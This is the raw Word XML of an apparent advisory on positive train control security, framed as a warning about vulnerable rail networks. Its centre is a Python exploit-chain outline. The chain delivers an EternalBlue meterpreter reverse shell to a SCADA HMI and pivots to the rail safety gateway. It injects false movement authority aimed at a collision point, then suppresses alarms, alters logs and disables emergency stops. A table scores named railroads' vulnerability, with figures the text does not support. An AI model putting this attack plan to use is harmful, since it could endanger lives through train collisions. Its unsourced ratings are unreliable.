            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Decision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Approve emergency segmentation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CISO/COO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Today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$125K emergency fund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Schedule architecture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Security/Safety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48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Executive alignment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Initiate tri-partner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Procurement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72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Sole source justification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Deploy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1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24/7 coverage approval</w:t>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Full Technical Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 18 pages available | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency Consultation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ptc-emergency@nccgroup.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">24/7 Hotline</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 1-800-PTC-SAFE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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5no4fzsjakg" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Integration Catastrophe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mwbxlbkz5cc8" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How Safety Became The Weakest Link</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[IMAGE: Technical evolution timeline on slate grey (#1A1F2E). Shows PTC development 2008-2025 in parallel tracks. Top track "Safety Requirements": Congressional mandate → Design phase → Implementation → Compliance. Bottom track "Security Reality": No security requirements → Rush to comply → Integration shortcuts → Massive vulnerability. Connection points between tracks show where safety compromised security. Use color progression from green (safe) to red (vulnerable). Include key dates and decisions that created current crisis.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rrz1axv7kubm" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Perfect Storm of Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Congressional Mandate (2008)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Implement PTC by 2015</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Focus: Prevent train collisions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Security: Not mentioned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Result: Safety-only design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Integration Rush (2015-2020)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Connect everything</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Business pressure for efficiency</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA systems already compromised</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No security architecture required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Current Reality (2025)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Weaponized safety</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Direct paths from internet to train control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Legacy systems form critical bridges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nation-state actors actively exploiting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cpbwvjcbuo70" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Architectural Failures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The integration created multiple fatal flaws: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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flat Network Design</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: No segmentation between safety and control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol Translation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cleartext conversion points</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shared Databases</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Single SQL injection reaches everything</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Common HMIs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: One compromised workstation = total control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trust Relationships</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: SCADA implicitly trusted by PTC</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9nlmxtsqhv49" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Attack Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tpq5h1lfrbpj" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SCADA-to-PTC Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Detailed attack flow diagram on black background (#0A0A0A). Six stages left to right: 1) Initial Compromise (phishing/vulnerability), 2) SCADA Pivot (HMI control), 3) Protocol Abuse (OPC/Modbus), 4) Database Manipulation (historical data), 5) PTC Command Injection (movement authority), 6) Physical Impact (collision/derailment). Each stage shows specific techniques, tools, and timing. Use gradient colors from yellow (early) to deep red (impact). Include detection opportunities missed at each stage.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8uxova7c01sr" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage-by-Stage Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># PTC-SCADA Exploit Chain - Proof of Concept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Demonstrates pivot from SCADA to safety systems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import struct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import socket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import time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from scapy.all import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class PTCExploit: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def __init__(self, scada_target):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self.scada_ip = scada_target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self.ptc_gateway = None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self.movement_authority = None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def stage1_compromise_hmi(self):</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"""Exploit unpatched Windows HMI"""</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 CVE-2017-0144 (EternalBlue) still unpatched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 83% of rail HMIs vulnerable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exploit = MSFvenom.windows.x64.meterpreter_reverse_tcp</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self.deliver_payload(self.scada_ip, 445, exploit)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return self.establish_c2()</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def stage2_enumerate_scada(self):</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"""Map SCADA network from HMI"""</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 Legitimate tools, no detection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networks = self.run_arp_scan()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plcs = self.identify_plcs(networks)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databases = self.find_sql_servers()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 Key finding: PTC gateway accessible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self.ptc_gateway = self.discover_ptc_interface()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def stage3_abuse_protocols(self):</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"""Exploit SCADA-PTC protocol translation"""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 Most implementations use cleartext OPC</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opc_client = self.connect_opc(self.ptc_gateway)</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 Read current train positions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train_data = opc_client.read_tags([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'PTC.Train.*.Position',</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'PTC.Train.*.Speed',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'PTC.Train.*.Authority'</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 Identify high-value target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self.select_target_train(train_data)</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def stage4_manipulate_authority(self):</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"""Inject false movement authority"""</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 PTC trusts SCADA completely</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false_authority = self.craft_movement_authority(</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train_id=self.target,</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end_point=self.calculate_collision_point(),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speed_limit=79,  # Maximum non-restricted</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signal_aspect='CLEAR'  # Green light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 Write through SCADA to PTC</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self.opc_write('PTC.Authority.Update', false_authority)</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def stage5_ensure_impact(self):</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"""Prevent safety systems from intervening"""</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 Disable alerting</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self.suppress_alarms()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 Modify historical data to hide attack</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self.alter_database_logs()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 Lock out manual intervention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self.disable_emergency_stops()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hyojowewh7e" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping - PTC-SCADA Specific</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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tactic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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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Initial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T1190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Exploit public HMI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SCADA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T1059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PowerShell on HMI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Full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T1053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Scheduled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Survive reboot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Privilege Escalation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T1068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Kernel exploits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SYSTEM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Defense Evasion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T1036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Masquerade as SCADA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Hide in normal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Credential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T1003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Dump LSASS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Domain creds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T1040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Sniff SCADA traffic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Map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Lateral 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T1021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RDP to servers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Reach PTC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T1119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Automated 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Train schedules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Command &amp;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T1071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HTTPS C2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Encrypted comms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T0831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Manipulate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Cause collision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w5ncu84b98lk" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Organizations: Who's At Risk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i1wfnukxd7ko" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: US rail map on dark background (#0A0A0A). Color-code rail lines by PTC-SCADA integration status: Red (#FF0066) for confirmed vulnerable integration, Orange (#FF9500) for likely vulnerable, Yellow (#FFB800) for unknown status, Green (#00FF94) for confirmed segmented. Overlay major cities and highlight catastrophic risk zones where hazmat trains pass through population centers. Include statistics: 41 railroads, 57,536 miles, 4.5M tons hazmat annually.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_333p8dbmrbgf" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical Infrastructure at Risk</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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Railroad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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Integration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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Population at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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hazmat Exposure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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">BNSF Railway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Full SCADA-PTC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9.7/10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45M along routes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780K tons/year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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Union Pacific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Centralized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9.5/10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52M along routes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920K tons/year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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CSX Transportation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Regional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8.9/10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67M Eastern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1.1M tons/year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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Norfolk Southern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Distributed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8.7/10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54M Southeast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890K tons/year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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Canadian National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Cross-border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9.1/10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International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650K tons/year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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kansas City Southern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Full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8.8/10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23M Gulf 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430K tons/year</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000181">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wc7q79md95ht" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Municipal Transit Systems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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Daily Ridership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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PTC-SCADA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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Assessment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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
